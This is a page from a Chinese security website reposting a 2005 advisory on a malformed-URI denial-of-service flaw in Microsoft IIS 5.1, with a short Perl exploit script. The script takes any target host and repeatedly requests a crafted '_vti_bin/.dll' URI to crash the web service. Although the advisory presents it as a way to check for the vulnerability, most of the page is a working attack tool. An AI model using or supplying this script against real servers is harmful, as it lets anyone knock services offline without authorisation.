首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Microsoft IIS Malformed URI DoS
来源:student.te.ugm.ac.id 作者:Ph03n1X 发布时间:2005-12-27  

Microsoft IIS Malformed URI DoS (Exploit)

Summary
Microsoft Internet Information Services (IIS) is "a set of Internet-based services for servers using Microsoft Windows".

Microsoft's IIS 5.1, the version that comes with Windows XP, contains a security vulnerability in its handing of incoming requests that allows remote attackers to cause the service to crash by sending it a malformed request. The following exploit code can be used to determine whether you are vulnerable to the malformed URI request affecting the IIS or not.

Credit:
The information has been provided by IbliZ PhoeniX.
The advisory can be found at: http://www.securiteam.com/windowsntfocus/6E00E2KEUS.html

Details
Vulnerable Systems:
* Microsoft Internet Information Server version 5.1

Immune Systems:
* Microsoft Internet Information Server version 5.0
* Microsoft Internet Information Server version 6.0

Exploit:
#!/usr/bin/perl
#Tested on IIS 5.1 Windos XP 2002

use LWP::UserAgent;

if(!$ARGV[0])
{
print "Hole found by Inge Henrikse\n";
print "Xplo Code by Ph03n1X || student.te.ugm.ac.id/~phoenix03\n";
print "Gunakan : $0 <target>\n\n";
exit;
}
$target=$ARGV[0];
#$proxy='http://222.124.24.23:3128';
$browse = LWP::UserAgent->new;
$browse->timeout(100);
$browse->agent("MSIE/6.0 Windows");
$browse->proxy(http=>$proxy) if defined($proxy);

$xplo="http://$target/_vti_bin/.dll/*\\~9";
for($i=0;$i<=20;$i++)
{$req = $browse->get($xplo);}

#No fix will be released by vendor until Win XP SP3
#(maybe in january 2006)
#EoF




 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·phpBB <= 2.0.17 signature_b
·Microsoft IIS Malformed URI Do
·Veritas Storage Foundation VCS
·PlanetFileServer DoS
·PHP-Fusion 6.x rating Paramete
·Electric Sheep Window-Id Local
·identd 1.2 remote exploit
·Advanced Guestbook version 2.2
·GKrellM Vulnerable to Remotely
·Microsoft Windows / Internet E
·wu_ftpd <=2.6.1 remote root
·Dev web management system <
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved